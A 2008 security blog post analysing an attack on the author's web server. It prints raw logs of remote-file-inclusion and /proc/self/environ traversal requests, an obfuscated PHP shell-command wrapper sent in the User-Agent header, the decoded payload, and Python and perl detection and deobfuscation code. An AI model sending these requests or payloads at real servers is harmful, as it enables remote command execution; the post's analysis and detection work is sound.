Blog for hpHosts, and whatever else I feel like writing about ....

Wednesday 10 September 2008

Alas, another exploit attempt (RFI+PHP)

Alas, it seems 88.84.157.127 (v32747.1blu.de) badly wanted to exploit my server. From the wonderful world of logs, we have (note that the scroll bars won't display in IE for some reason):


2008-09-10 06:40:53 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=http://bregler-gmbh.de/.sys/i??? 80 - 88.84.157.127 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-10 06:40:53 GET /misc/cyberdefender/errors.php error=http://bregler-gmbh.de/.sys/i??? 80 - 88.84.157.127 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-10 06:40:53 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 88.84.157.127 <?+$x0e="\145x\x65\x63";+$x0f="\x66eo\146";+$x10="\x66\x72ea\x64";+$x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";+$x12="i\163\x5f\162\x65s\157ur\x63\x65";+$x13="\152\157\x69\156";+$x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";+$x15="ob\137\x65\156d\137\x63lea\156";+$x16="\x6fb_st\x61\x72\164";+$x17="\x70\141\163s\164\x68\162\165";+$x18="\x70\143\154ose";+$x19="p\157\160e\x6e";+$x1a="\163h\145\154l\137\x65\170e\143";+$x1b="\x73\x79s\x74e\x6d";+function+x0b($x0b){+global+$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;++$x0c+=+'';+if+(!empty($x0b))+{if($x11('exec'))+{@$x0e($x0b,$x0c);$x0c+=+$x13("\n",$x0c);+}elseif($x11('shell_exec'))+{$x0c+=+@$x1a($x0b);+}elseif($x11('system'))+{@$x16();@$x1b($x0b);$x0c+=+@$x14();@$x15();+}elseif($x11('passthru'))+{@$x16();@$x17($x0b);$x0c+=+@$x14();@$x15();+}elseif(@$x12($x0d+=+@$x19($x0b,"\x72"))){+$x0c+=+"";+while(!@$x0f($x0d))+{+$x0c+.=+@$x10($x0d,1024);+}+@$x18($x0d);}+}+return+$x0c;}echo+x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");?> - mysteryfcm.co.uk 200 0 0
2008-09-10 06:40:53 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 88.84.157.127 <?+$x0e="\145x\x65\x63";+$x0f="\x66eo\146";+$x10="\x66\x72ea\x64";+$x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";+$x12="i\163\x5f\162\x65s\157ur\x63\x65";+$x13="\152\157\x69\156";+$x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";+$x15="ob\137\x65\156d\137\x63lea\156";+$x16="\x6fb_st\x61\x72\164";+$x17="\x70\141\163s\164\x68\162\165";+$x18="\x70\143\154ose";+$x19="p\157\160e\x6e";+$x1a="\163h\145\154l\137\x65\170e\143";+$x1b="\x73\x79s\x74e\x6d";+function+x0b($x0b){+global+$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;++$x0c+=+'';+if+(!empty($x0b))+{if($x11('exec'))+{@$x0e($x0b,$x0c);$x0c+=+$x13("\n",$x0c);+}elseif($x11('shell_exec'))+{$x0c+=+@$x1a($x0b);+}elseif($x11('system'))+{@$x16();@$x1b($x0b);$x0c+=+@$x14();@$x15();+}elseif($x11('passthru'))+{@$x16();@$x17($x0b);$x0c+=+@$x14();@$x15();+}elseif(@$x12($x0d+=+@$x19($x0b,"\x72"))){+$x0c+=+"";+while(!@$x0f($x0d))+{+$x0c+.=+@$x10($x0d,1024);+}+@$x18($x0d);}+}+return+$x0c;}echo+x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");?> - mysteryfcm.co.uk 200 0 0
2008-09-10 06:40:53 GET /server_request.php CONFIG[gameroot]=http://bregler-gmbh.de/.sys/i??? 80 - 88.84.157.127 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-10 06:40:53 GET /errors.php error=http://bregler-gmbh.de/.sys/i??? 80 - 88.84.157.127 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-10 06:40:53 GET /server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 88.84.157.127 <?+$x0e="\145x\x65\x63";+$x0f="\x66eo\146";+$x10="\x66\x72ea\x64";+$x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";+$x12="i\163\x5f\162\x65s\157ur\x63\x65";+$x13="\152\157\x69\156";+$x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";+$x15="ob\137\x65\156d\137\x63lea\156";+$x16="\x6fb_st\x61\x72\164";+$x17="\x70\141\163s\164\x68\162\165";+$x18="\x70\143\154ose";+$x19="p\157\160e\x6e";+$x1a="\163h\145\154l\137\x65\170e\143";+$x1b="\x73\x79s\x74e\x6d";+function+x0b($x0b){+global+$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;++$x0c+=+'';+if+(!empty($x0b))+{if($x11('exec'))+{@$x0e($x0b,$x0c);$x0c+=+$x13("\n",$x0c);+}elseif($x11('shell_exec'))+{$x0c+=+@$x1a($x0b);+}elseif($x11('system'))+{@$x16();@$x1b($x0b);$x0c+=+@$x14();@$x15();+}elseif($x11('passthru'))+{@$x16();@$x17($x0b);$x0c+=+@$x14();@$x15();+}elseif(@$x12($x0d+=+@$x19($x0b,"\x72"))){+$x0c+=+"";+while(!@$x0f($x0d))+{+$x0c+.=+@$x10($x0d,1024);+}+@$x18($x0d);}+}+return+$x0c;}echo+x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");?> - mysteryfcm.co.uk 200 0 0
2008-09-10 06:40:54 GET /server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 88.84.157.127 <?+$x0e="\145x\x65\x63";+$x0f="\x66eo\146";+$x10="\x66\x72ea\x64";+$x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";+$x12="i\163\x5f\162\x65s\157ur\x63\x65";+$x13="\152\157\x69\156";+$x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";+$x15="ob\137\x65\156d\137\x63lea\156";+$x16="\x6fb_st\x61\x72\164";+$x17="\x70\141\163s\164\x68\162\165";+$x18="\x70\143\154ose";+$x19="p\157\160e\x6e";+$x1a="\163h\145\154l\137\x65\170e\143";+$x1b="\x73\x79s\x74e\x6d";+function+x0b($x0b){+global+$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;++$x0c+=+'';+if+(!empty($x0b))+{if($x11('exec'))+{@$x0e($x0b,$x0c);$x0c+=+$x13("\n",$x0c);+}elseif($x11('shell_exec'))+{$x0c+=+@$x1a($x0b);+}elseif($x11('system'))+{@$x16();@$x1b($x0b);$x0c+=+@$x14();@$x15();+}elseif($x11('passthru'))+{@$x16();@$x17($x0b);$x0c+=+@$x14();@$x15();+}elseif(@$x12($x0d+=+@$x19($x0b,"\x72"))){+$x0c+=+"";+while(!@$x0f($x0d))+{+$x0c+.=+@$x10($x0d,1024);+}+@$x18($x0d);}+}+return+$x0c;}echo+x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");?> - mysteryfcm.co.uk 200 0 0
2008-09-10 06:40:54 GET /misc/server_request.php CONFIG[gameroot]=http://bregler-gmbh.de/.sys/i??? 80 - 88.84.157.127 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-10 06:40:54 GET /misc/errors.php error=http://bregler-gmbh.de/.sys/i??? 80 - 88.84.157.127 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-10 06:40:54 GET /misc/server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 88.84.157.127 <?+$x0e="\145x\x65\x63";+$x0f="\x66eo\146";+$x10="\x66\x72ea\x64";+$x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";+$x12="i\163\x5f\162\x65s\157ur\x63\x65";+$x13="\152\157\x69\156";+$x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";+$x15="ob\137\x65\156d\137\x63lea\156";+$x16="\x6fb_st\x61\x72\164";+$x17="\x70\141\163s\164\x68\162\165";+$x18="\x70\143\154ose";+$x19="p\157\160e\x6e";+$x1a="\163h\145\154l\137\x65\170e\143";+$x1b="\x73\x79s\x74e\x6d";+function+x0b($x0b){+global+$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;++$x0c+=+'';+if+(!empty($x0b))+{if($x11('exec'))+{@$x0e($x0b,$x0c);$x0c+=+$x13("\n",$x0c);+}elseif($x11('shell_exec'))+{$x0c+=+@$x1a($x0b);+}elseif($x11('system'))+{@$x16();@$x1b($x0b);$x0c+=+@$x14();@$x15();+}elseif($x11('passthru'))+{@$x16();@$x17($x0b);$x0c+=+@$x14();@$x15();+}elseif(@$x12($x0d+=+@$x19($x0b,"\x72"))){+$x0c+=+"";+while(!@$x0f($x0d))+{+$x0c+.=+@$x10($x0d,1024);+}+@$x18($x0d);}+}+return+$x0c;}echo+x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");?> - mysteryfcm.co.uk 200 0 0
2008-09-10 06:40:54 GET /misc/server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 88.84.157.127 <?+$x0e="\145x\x65\x63";+$x0f="\x66eo\146";+$x10="\x66\x72ea\x64";+$x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";+$x12="i\163\x5f\162\x65s\157ur\x63\x65";+$x13="\152\157\x69\156";+$x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";+$x15="ob\137\x65\156d\137\x63lea\156";+$x16="\x6fb_st\x61\x72\164";+$x17="\x70\141\163s\164\x68\162\165";+$x18="\x70\143\154ose";+$x19="p\157\160e\x6e";+$x1a="\163h\145\154l\137\x65\170e\143";+$x1b="\x73\x79s\x74e\x6d";+function+x0b($x0b){+global+$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;++$x0c+=+'';+if+(!empty($x0b))+{if($x11('exec'))+{@$x0e($x0b,$x0c);$x0c+=+$x13("\n",$x0c);+}elseif($x11('shell_exec'))+{$x0c+=+@$x1a($x0b);+}elseif($x11('system'))+{@$x16();@$x1b($x0b);$x0c+=+@$x14();@$x15();+}elseif($x11('passthru'))+{@$x16();@$x17($x0b);$x0c+=+@$x14();@$x15();+}elseif(@$x12($x0d+=+@$x19($x0b,"\x72"))){+$x0c+=+"";+while(!@$x0f($x0d))+{+$x0c+.=+@$x10($x0d,1024);+}+@$x18($x0d);}+}+return+$x0c;}echo+x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");?> - mysteryfcm.co.uk 200 0 0
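Not part of the original post: an added Python example that parses constructed log lines in the same IIS W3C field order as the entries above and flags the three things visible in them, a parameter value that points at a remote URL (the RFI), a traversal to /proc/self/environ, and PHP tags in the User-Agent header. The sample lines, hostnames and addresses (example.invalid, 192.0.2.x) are constructed for the example, not taken from the post's logs.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Constructed sample lines (not the post's logs) in the same IIS W3C layout:
# date time method uri-stem query port user client-ip user-agent referer host status substatus win32
SAMPLE_LOG = """\
2008-09-10 06:40:53 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=http://example.invalid/.sys/i 80 - 192.0.2.10 Mozilla/4.0+(compatible) - www.example.org 404 0 2
2008-09-10 06:40:53 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=../../../../../../proc/self/environ 80 - 192.0.2.10 <?+echo+'probe';?> - www.example.org 200 0 0
2008-09-10 06:41:00 GET /index.php page=about 80 - 198.51.100.7 Mozilla/5.0+(X11;+Linux) http://www.example.org/ www.example.org 200 0 0
"""

FIELDS = ["date", "time", "method", "stem", "query", "port", "user", "client_ip",
          "user_agent", "referer", "host", "status", "substatus", "win32"]

URL_SCHEME = re.compile(r"^(?:https?|ftp)://", re.I)               # parameter value points off-host: RFI
TRAVERSAL = re.compile(r"(?:\.\./){2,}|/proc/self/environ", re.I)  # local file inclusion / traversal
PHP_TAG = re.compile(r"<\?(?:php)?")                                # PHP code carried in a request header


def parse_line(line):
    """Split one W3C log line into a dict; return None for lines that do not fit the layout."""
    parts = line.split()
    if len(parts) != len(FIELDS):
        return None
    rec = dict(zip(FIELDS, parts))
    rec["query"] = "" if rec["query"] == "-" else rec["query"]
    # IIS writes spaces in header values as '+'; undo that so patterns match the real header.
    rec["user_agent"] = unquote_plus(rec["user_agent"])
    rec["referer"] = unquote_plus(rec["referer"])
    return rec


def classify(rec):
    """Return a list of (indicator, where, evidence) tuples for one parsed request."""
    findings = []
    for name, value in parse_qsl(rec["query"], keep_blank_values=True):
        if URL_SCHEME.match(value):
            findings.append(("rfi", name, value))
        if TRAVERSAL.search(value):
            findings.append(("traversal", name, value))
    for header in ("user_agent", "referer"):
        if PHP_TAG.search(rec[header]):
            findings.append(("php_in_header", header, rec[header]))
    return findings


def scan(log_text):
    """Return (client_ip, uri_stem, status, findings) for every suspicious line."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        findings = classify(rec)
        if findings:
            hits.append((rec["client_ip"], rec["stem"], rec["status"], findings))
    return hits


if __name__ == "__main__":
    for ip, stem, status, findings in scan(SAMPLE_LOG):
        print(ip, stem, status)
        for indicator, where, evidence in findings:
            print("   ", indicator, where, evidence[:60])
```

The status field is kept on purpose: in the post's own entries the remote-URL attempts returned 404 while the /proc/self/environ requests returned 200, and a traversal that comes back 200 is the line worth looking at first.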


The RFI (Remote File Inclusion) payload comes courtesy of:

http://bregler-gmbh.de/.sys/i???


*****************************************************************
vURL Desktop Edition v0.3.4 Results
Source code for: http://bregler-gmbh.de/.sys/i???
Server IP: 212.227.240.102 [ regiocd.de ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
Date: 10 September 2008
Time: 08:49:35:49
*****************************************************************

#####################################################################
# +------------------+ #
# | ___ | Crank #
# | _ (,~ | _ | we are crank. this is crank. #
# | (____/ |____) | #
# | ||||| ||||| | if your skilld in perl,php,c,c++ #
# | ||||| ||||| | Contact: http://cr4nk.ws #
# | |||||\ /||||| | E-Mail : cr4nk@land.ru #
# | |||'//\/\\`||| | irc.unixunited.net /join #cr4nk #
# | |' m' /\ `m `| | #
# | /||\ | Greets to our Friends #
# \_ _/ tng,asc,satyr #
# `------------' #
#####################################################################


$x0b="in\x69_\147\x65\x74"; $x0c="\163tr\x74o\154\x6fwe\x72";
echo "c\162\141\156k\x5fr\157c\x6bs";if (@$x0b("\163\x61\x66e_\x6d\157\144e") or $x0c(@$x0b("\x73a\x66\x65_m\x6fde")) == "\x6f\x6e"){echo "\123a\146\x65\155od\145\x3ao\156";}else {echo "\123a\146e\x6do\x64e:\x6ff\x66";}exit(); ?>


Most likely a hacked server, but they've been notified.

The code they've tried injecting directly (it is sent in the User-Agent header, which is what the /proc/self/environ traversal above pulls into the include) is as follows:


<?
    $x0e="\145x\x65\x63";
    $x0f="\x66eo\146";
    $x10="\x66\x72ea\x64";
    $x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";
    $x12="i\163\x5f\162\x65s\157ur\x63\x65";
    $x13="\152\157\x69\156";
    $x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";
    $x15="ob\137\x65\156d\137\x63lea\156";
    $x16="\x6fb_st\x61\x72\164";
    $x17="\x70\141\163s\164\x68\162\165";
    $x18="\x70\143\154ose";
    $x19="p\157\160e\x6e";
    $x1a="\163h\145\154l\137\x65\170e\143";
    $x1b="\x73\x79s\x74e\x6d";
    function x0b($x0b){
        global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;
        $x0c='';
        if(!empty($x0b)){
            if($x11('exec')){
                @$x0e($x0b,$x0c);
                $x0c=$x13("\n",$x0c);
            }
            elseif($x11('shell_exec')){
                $x0c=@$x1a($x0b);
            }
            elseif($x11('system')){
                @$x16();@$x1b($x0b);$x0c=@$x14();@$x15();
            }
            elseif($x11('passthru')){
                @$x16();@$x17($x0b);$x0c=@$x14();@$x15();
            }
            elseif(@$x12($x0d=@$x19($x0b,"\x72"))){
                $x0c="";
                while(!@$x0f($x0d)){
                    $x0c.=@$x10($x0d,1024);
                }
                @$x18($x0d);
            }
        }
        return $x0c;
    }
    echo x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");
?>


/edit

I sent this to the ladies and gents at the ISC (Internet Storm Center), and got a reply from Bojan Zdrnj (cheers Bojan :o)):


Thanks for sending this. They basically obfuscate characters by using their hex or octal values. When you see numbers like \111 it's their octal value, and when you see numbers like \x1f it's the hex value.

You can clean this up by using perl easily. I just saved the original PHP (the one you sent) into sample.php and used the following line (two perl calls inside, this could be done in a single perl program as well):

$ perl -pe 's/\\(\d{3})/chr(oct($1))/ge' < sample.php | perl -pe 's/\\x([0-9a-fA-F]{2})/chr(hex($1))/ge'


Once you execute this you'll get readable code:

<?
    $x0e="exec";
    $x0f="feof";
    $x10="fread";
    $x11="function_exists";
    $x12="is_resource";
    $x13="join";
    $x14="ob_get_contents";
    $x15="ob_end_clean";
    $x16="ob_start";
    $x17="passthru";
    $x18="pclose";
    $x19="popen";
    $x1a="shell_exec";
    $x1b="system";
    // Runs $x0b as a shell command, trying each execution function in turn
    // until one is available, and returns whatever the command printed.
    function x0b($x0b){
        global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;
        $x0c='';
        if(!empty($x0b)){
            if($x11('exec')){
                @$x0e($x0b,$x0c);
                $x0c=$x13("\n",$x0c);
            }
            elseif($x11('shell_exec')){
                $x0c=@$x1a($x0b);
            }
            elseif($x11('system')){
                // system() and passthru() print directly, so output buffering captures the result
                @$x16();@$x1b($x0b);$x0c=@$x14();@$x15();
            }
            elseif($x11('passthru')){
                @$x16();@$x17($x0b);$x0c=@$x14();@$x15();
            }
            elseif(@$x12($x0d=@$x19($x0b,"r"))){
                // last resort: popen() and read the pipe
                $x0c="";
                while(!@$x0f($x0d)){
                    $x0c.=@$x10($x0d,1024);
                }
                @$x18($x0d);
            }
        }
        return $x0c;
    }
    echo x0b("echo cr4nk_rocks");
?>


This results in them trying to execute the command "echo cr4nk rocks" by using the PHP functions exec, shell_exec, system and passthru. At the end they probably check the result so if they get the string "cr4nk rocks" back, they know that the RFI attack worked.

Cheers,

Bojan
ISC Handler
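As an added example, not Bojan's or the post's own code: the same decoding done in Python, applying the general PHP rule (one to three octal digits, one or two hex digits in either case) so escapes such as \x6f decode as well, and then listing which variables alias an execution function, which is the quickest way to see what a script of this kind can do. The sample input and the DANGEROUS list are constructed for the example.

```python
import re

# Matches the two escape forms used inside PHP double-quoted strings:
# \xHH (one or two hex digits, either case) and \OOO (one to three octal digits).
ESCAPE = re.compile(r"\\(?:x([0-9A-Fa-f]{1,2})|([0-7]{1,3}))")

# Execution-capable functions worth flagging once the string aliases are readable (assumed list).
DANGEROUS = {"exec", "shell_exec", "system", "passthru", "popen", "proc_open", "eval", "assert"}

# Constructed sample (hypothetical), built from string literals of the kind seen in the post.
SAMPLE = r'''<? $x0b="in\x69_\147\x65\x74"; $x0c="\163tr\x74o\154\x6fwe\x72";
$x1a="\163h\145\154l\137\x65\170e\143"; $x1b="\x73\x79s\x74e\x6d";
echo "c\162\141\156k\x5fr\157c\x6bs"; ?>'''


def decode_escapes(src):
    """Replace \\xHH and \\OOO escapes with the characters they stand for; other escapes stay as-is."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8))
    return ESCAPE.sub(repl, src)


# $name = "literal";  (only double-quoted literals, which is where the escapes live)
ASSIGN = re.compile(r'\$(\w+)\s*=\s*"([^"]*)"')


def string_aliases(decoded):
    """Map variable names to the string literal assigned to them ($x1a = "shell_exec" -> x1a)."""
    return dict(ASSIGN.findall(decoded))


def dangerous_aliases(decoded):
    """Subset of string_aliases whose value is an execution function: the $var(...) calls to read first."""
    return {var: fn for var, fn in string_aliases(decoded).items() if fn in DANGEROUS}


if __name__ == "__main__":
    decoded = decode_escapes(SAMPLE)
    print(decoded)
    print("aliases:", string_aliases(decoded))
    print("execution functions:", dangerous_aliases(decoded))
```

Like the perl one-liner, this decodes escapes wherever they appear rather than only inside double-quoted strings, so a literal backslash-x inside a single-quoted PHP string would be decoded too; for triage of a dropped script that is the right trade-off, since the goal is readability rather than a faithful PHP parse.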

1 comment:

Tim said...

Thanks for the post. Our webservers were recently scanned with the same attempted exploit.